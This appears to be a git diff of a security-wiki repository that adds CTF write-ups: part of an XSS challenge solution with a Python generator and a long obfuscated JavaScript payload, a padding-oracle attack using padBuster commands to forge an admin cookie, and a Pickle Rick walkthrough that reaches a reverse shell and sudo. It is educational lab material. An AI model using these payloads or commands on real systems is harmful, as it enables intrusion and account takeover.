f'e[{parentNode}][{parentNode}][{parentNode}][{children}][{captcha}][{x["g"]}][{outerHTML}][38]' +x['('] = f'e[{parentNode}][{parentNode}][{parentNode}][{children}][{captcha}][{x["g"]}][{outerHTML}][42]' +x[')'] = f'e[{parentNode}][{parentNode}][{parentNode}][{children}][{captcha}][{x["g"]}][{outerHTML}][43]' + + +# Exploit generation +payload_text = '' +payload = '+'.join(x[k] for k in payload_text) + +txt = f'{document}[{write}]'+'`${['+payload+']}`' + +print(txt) #Write the exploit to stdout +``` + +### Exploitation + +In order to generate the exploit just execute the previous python code. If you prefer, you can also copy/paste it from here: + +```text +e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[][[]]+e][0][5]+[e+e][0][21]+[[][[]]+e][0][2]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]][[e+e][0][5]+[[]/e+e][0][1]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[e+e][0][6]+[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[]/e+e][0][1]][[e+e][0][15]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][35]+[e+e][0][13]+[[][[]]+e][0][5]+[e+e][0][6]+[e+e][0][4]]`${[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][0]+[e+e][0][18]+[e+e][0][5]+[e+e][0][13]+[[][[]]+e][0][5]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[e+e][0][6]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][62]+[[]/e+e][0][1]+[e+e][0][21]+[e+e][0][4]+[e+e][0][13]+[e+e][0][6]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[][[]]+e][0][5]+[e+e][0][21]+[[][[]]+e][0][2]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]][[e+e][0][5]+[[]/e+e][0][1]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[e+e][0][6]+[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[]/e+e][0][1]][[e+e][0][15]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][42]+[[][[]]+e][0][2]+[e+e][0][1]+[e+e][0][5]+[[][[]]+e][0][0]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[][[]]+e][0][5]+[e+e][0][21]+[[][[]]+e][0][2]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]][[e+e][0][5]+[[]/e+e][0][1]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[e+e][0][6]+[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[]/e+e][0][1]][[e+e][0][15]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][38]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[e+e][0][0]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][13]+[[][[]]+e][0][2]+[e+e][0][1]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[][[]]+e][0][5]+[e+e][0][21]+[[][[]]+e][0][2]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]][[e+e][0][5]+[[]/e+e][0][1]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[e+e][0][6]+[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[]/e+e][0][1]][[e+e][0][15]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][38]+[[]/e+e][0][1]+[[][[]]+e][0][5]+[[][[]]+e][0][1]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][13]+[e+e][0][27]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[][[]]+e][0][5]+[e+e][0][21]+[[][[]]+e][0][2]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]][[e+e][0][5]+[[]/e+e][0][1]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[e+e][0][6]+[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[]/e+e][0][1]][[e+e][0][15]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][43]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][0]+[/e/+e][0][0]+[e+e][0][18]+[e+e][0][5]+[e+e][0][13]+[[][[]]+e][0][5]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[e+e][0][6]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][62]]}` +``` + +Then, you need to **generate a HTML page** that, when loaded, it’s going to **redirect** the victim to the **challenge** page **setting the exploit in the captcha form**. The following code can be use for this purpose \(_note that the exploit is URL encoded_\): + +```markup + + + +
+ + +
+ + + + +``` + +Finally, **serve the poc in a HTTP** server and access it from the browser: + + +![](https://i.imgur.com/qack7GO.png) + +Just press **submit** on the captcha form and the alert will be executed: + +![](https://i.imgur.com/mCORty3.png) + diff --git a/ctf-write-ups/try-hack-me/README.md b/ctf-write-ups/try-hack-me/README.md new file mode 100644 index 00000000000..77d292c6feb --- /dev/null +++ b/ctf-write-ups/try-hack-me/README.md @@ -0,0 +1,2 @@ +# Try Hack Me + diff --git a/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md b/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md new file mode 100644 index 00000000000..b65c51b4a7b --- /dev/null +++ b/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md @@ -0,0 +1,42 @@ +# hc0n Christmas CTF - 2019 + +![](../../.gitbook/assets/41d0cdc8d99a8a3de2758ccbdf637a21.jpeg) + +## Enumeration + +I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion): + +![](../../.gitbook/assets/image%20%2821%29.png) + +There are 2 ports open: 80 \(**HTTP**\) and 22 \(**SSH**\) + +In the web page you can **register new users**, and I noticed that **the length of the cookie depends on the length of the username** indicated: + +![](../../.gitbook/assets/image%20%28311%29.png) + +![](../../.gitbook/assets/image%20%28318%29.png) + +And if you change some **byte** of the **cookie** you get this error: + +![](../../.gitbook/assets/image%20%28109%29.png) + +With this information and[ **reading the padding oracle vulnerability**](../../cryptography/padding-oracle-priv.md) I was able to exploit it: + +```bash +perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" +``` + +![](../../.gitbook/assets/image%20%2853%29.png) + +![](../../.gitbook/assets/image%20%28173%29.png) + +**Set user admin:** + +```bash +perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" -plaintext "user=admin" +``` + +![](../../.gitbook/assets/image%20%28271%29.png) + + + diff --git a/ctf-write-ups/try-hack-me/pickle-rick.md b/ctf-write-ups/try-hack-me/pickle-rick.md new file mode 100644 index 00000000000..b611a9cae8e --- /dev/null +++ b/ctf-write-ups/try-hack-me/pickle-rick.md @@ -0,0 +1,62 @@ +# Pickle Rick + +![](../../.gitbook/assets/picklerick.gif) + +This machine was categorised as easy and it was pretty easy. + +## Enumeration + +I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion): + +![](../../.gitbook/assets/image%20%2879%29.png) + +In as you can see 2 ports are open: 80 \(**HTTP**\) and 22 \(**SSH**\) + +So, I launched legion to enumerate the HTTP service: + +![](../../.gitbook/assets/image%20%28140%29.png) + +Note that in the image you can see that `robots.txt` contains the string `Wubbalubbadubdub` + +After some seconds I reviewed what `disearch` has already discovered : + +![](../../.gitbook/assets/image%20%28132%29.png) + +![](../../.gitbook/assets/image%20%28105%29.png) + +And as you may see in the last image a **login** page was discovered. + +Checking the source code of the root page, a username is discovered: `R1ckRul3s` + +![](../../.gitbook/assets/image%20%28324%29.png) + +Therefore, you can login on the login page using the credentials `R1ckRul3s:Wubbalubbadubdub` + +## User + +Using those credentials you will access a portal where you can execute commands: + +![](../../.gitbook/assets/image%20%28196%29.png) + +Some commands like cat aren't allowed but you can read the first ingredient \(flag\) using for example grep: + +![](../../.gitbook/assets/image%20%28218%29.png) + +Then I used: + +![](../../.gitbook/assets/image%20%28171%29.png) + +To obtain a reverse shell: + +![](../../.gitbook/assets/image%20%2851%29.png) + +The **second ingredient** can be found in `/home/rick` + +![](../../.gitbook/assets/image%20%2857%29.png) + +## Root + +The user **www-data can execute anything as sudo**: + +![](../../.gitbook/assets/image%20%2884%29.png) + diff --git a/docker-compose.yml b/docker-compose.yml deleted file mode 100644 index 736e384b46b..00000000000 --- a/docker-compose.yml +++ /dev/null @@ -1,19 +0,0 @@ -# Run locally: docker compose up (or: podman compose up) -> http://localhost:3337 -services: - hacktricks: - image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest - platform: linux/amd64 # published image is amd64-only - container_name: hacktricks - ports: - - "3337:3000" - volumes: - - .:/app - working_dir: /app - environment: - MDBOOK_PREPROCESSOR__HACKTRICKS__ENV: dev - command: - - bash - - -c - - > - git config --global --add safe.directory /app && - mdbook serve --hostname 0.0.0.0 --port 3000 diff --git a/emails-vulns.md b/emails-vulns.md new file mode 100644 index 00000000000..ff90182e753 --- /dev/null +++ b/emails-vulns.md @@ -0,0 +1,58 @@ +# Emails Vulnerabilities + +## Payloads + +### Ignored parts of an email + +The symbols: **+, -** and **{}** in rare occasions can be used for tagging and ignored by most e-mail servers + +* E.g. john.doe+intigriti@example.com → john.doe@example.com + +**Comments between parentheses \(\)** at the beginning or the end will also be ignored + +* E.g. john.doe\(intigriti\)@example.com → john.doe@example.com + +### Whitelist bypass + +* 